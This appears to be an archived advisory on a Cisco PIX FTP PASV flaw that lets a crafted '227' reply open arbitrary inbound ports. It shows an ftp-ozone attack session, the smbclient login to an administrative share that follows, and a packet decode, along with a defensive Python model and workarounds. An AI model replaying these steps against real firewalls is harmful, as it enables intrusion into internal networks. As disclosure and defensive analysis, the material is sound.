COMMAND
PIX
SYSTEMS AFFECTED
Cisco
PROBLEM
Eric Monti confirmed and did some more research regarding the PIX
hole mentioned by Jacek Lipkowski on bugtraq entitled. It's
available at:
http://oliver.efri.hr/~crv/security/bugs/Others/fw-13.html
Eric was able to verify that PIX is vulnerable to the FTP-Pasv
vulnerability that has been discussed on the Bugtraq mailing list
as of late. Here are his notes and findings.
In a nutshell, the PIX can be fooled into opening up ports for
inbound connections to a DMZ FTP server if the FTP server can be
fooled into sending back what looks like a valid "227
(xxx,xxx,xxx,xxx,prt,prt)" response. The problem on the PIX is that
the 'fixup protocol ftp' component does not perform sufficient
checks to verify PASV connections before creating a dynamic hole
through the firewall. Note that there are several ways to get the
FTP server to generate the message that triggers PIX's insecure
behaviour. The exploit used for testing was Dug Song's ftp-ozone.c
(available at the link above).
The PIX tested is running the 4.4(4) version of software. Other
versions have not been tested but are most likely vulnerable.
Here is the session from the attacker. "ftp-ozone" is the public
exploit from Dug Song. Eric made a few minor 'aesthetic'
adjustments and added support for anonymous login with '-l'
(although it wasn't used in this example). The source code is
below.
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500 '...........................................................................................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2000
boot.ini ASR 279 Mon Mar 13 03:15:07 2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58 2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSSCE D 0 Tue Mar 7 14:29:57 2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2000
ntldr AHSR 156496 Tue Mar 7 11:47:49 2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51 2000
Program Files D 0 Tue Mar 7 11:35:11 2000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2000
TEMP DA 0 Tue Mar 7 14:36:31 2000
WINNT D 0 Tue Mar 7 14:30:05 2000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
As you can see above, after the manipulated packet generated from
the FTP server by ftp-ozone is returned, we are able to connect
to the NBT (tcp/139) service and access a share. On the PIX with
'logging console debug' set, this was all that showed up:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139
gaddr 10.1.2.3/21 laddr 192.168.205.2/21
Below is a packet decode generated from tcpdump -w. The IPs used
are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
victim-real=192.168.205.2 (doesn't appear in the decode).
The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).
In Packet #11 of the decode, in the TCP data segment, you can see
what is triggering the PIX's insecure behavior: "227
(10,1,2,3,0,139)': command not understood."
This confirms what was assumed; that the only check that the PIX
makes before creating a dynamic PASV conduit is whether the "227
(xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the packet.
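To make the missing checks concrete, here is an added model (not PIX code and not part of Eric's notes) of what a PASV fixup has to do before it may open a pinhole: reassemble server replies at CRLF boundaries so a "227 (" that merely begins a TCP segment is never taken as a reply, require an outstanding PASV from the client, and compare the advertised host and port against the server's address and a low-port policy. The ozone_replay() helper feeds it the server-side bytes of packets 9 and 11 from the decode below (the run of dots stands in for the echoed garbage, lengths reconstructed).

```python
import re
from dataclasses import dataclass, field
# RFC 959 PASV reply "227 <text> (h1,h2,h3,h4,p1,p2)" filling a whole reply line.
PASV_REPLY = re.compile(r"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)\.?\s*$")

@dataclass
class FtpInspector:
    """Checks a PASV fixup should make before opening a pinhole (constructed model, not PIX code)."""
    server_ip: str  # FTP server address as seen on the control connection
    pasv_pending: bool = False
    reply_buf: str = ""
    opened: list = field(default_factory=list)
    rejected: list = field(default_factory=list)

    def client_to_server(self, data: str) -> None:
        # Only a PASV command from the client arms the inspector.
        for line in data.split("\r\n"):
            if line.strip().upper() == "PASV":
                self.pasv_pending = True

    def server_to_client(self, data: str) -> None:
        # Reassemble the reply stream: a reply is complete only at CRLF, so "227 ("
        # at the start of a TCP segment is not by itself a reply.
        self.reply_buf += data
        while "\r\n" in self.reply_buf:
            line, self.reply_buf = self.reply_buf.split("\r\n", 1)
            self._check_reply(line)

    def _check_reply(self, line: str) -> None:
        m = PASV_REPLY.match(line)
        if m:
            host = ".".join(m.group(i) for i in range(1, 5))
            port = int(m.group(5)) * 256 + int(m.group(6))
            if not self.pasv_pending:
                self.rejected.append((host, port, "no PASV outstanding"))
            elif host != self.server_ip:
                self.rejected.append((host, port, "host differs from FTP server"))
            elif port < 1024:  # policy: never pinhole a well-known port for a data channel
                self.rejected.append((host, port, "well-known port"))
            else:
                self.opened.append((host, port))
        if re.match(r"^\d{3} ", line):  # any final reply line answers the outstanding PASV
            self.pasv_pending = False

def ozone_replay(server_ip: str = "10.1.2.3") -> FtpInspector:
    """Replay the server bytes of packets 9 and 11 (constructed; dots stand in for the garbage)."""
    insp = FtpInspector(server_ip)
    insp.server_to_client("500 '" + "." * 123)  # packet 9: 128 bytes, no CRLF yet
    insp.server_to_client("227 (10,1,2,3,0,139)': command not understood.\r\n")  # packet 11
    return insp
```

Replayed this way the 227 text is the tail of a 500 error line, so no pinhole is opened; a genuine 227 following a PASV is accepted, while one that arrives unsolicited or advertises port 139 is refused.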
Here's the packet decode:
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
...........................................................................................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500 '...........................................................................................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
SOLUTION
Essentially this is the same as the more widely publicized
Firewall-1 incarnation of the hole (without their patch), only
there are a few major differences to note:
1. The port opened will allow bi-directional traffic
(confirmed in PIX 4.4(4), probably others as well).
2. *ANY* port can be opened, even low-numbered and well-known
ports. This could be worked around with a conduit ACL
using explicit denies on the external interface.
3. The 'fixup protocol ftp' is what appears to be the core of
this problem on the PIX side of it. If it is disabled the
exploit (in any version) will not work. This is what
handles PASV FTP on the PIX. If you disable it though,
there are two things to note:
- Outbound ftp connections from the inside *have* to be made
with PASV ftp clients.
- Inbound ftp connections from the outside world cannot use
PASV.
There may be other workarounds than those cited above.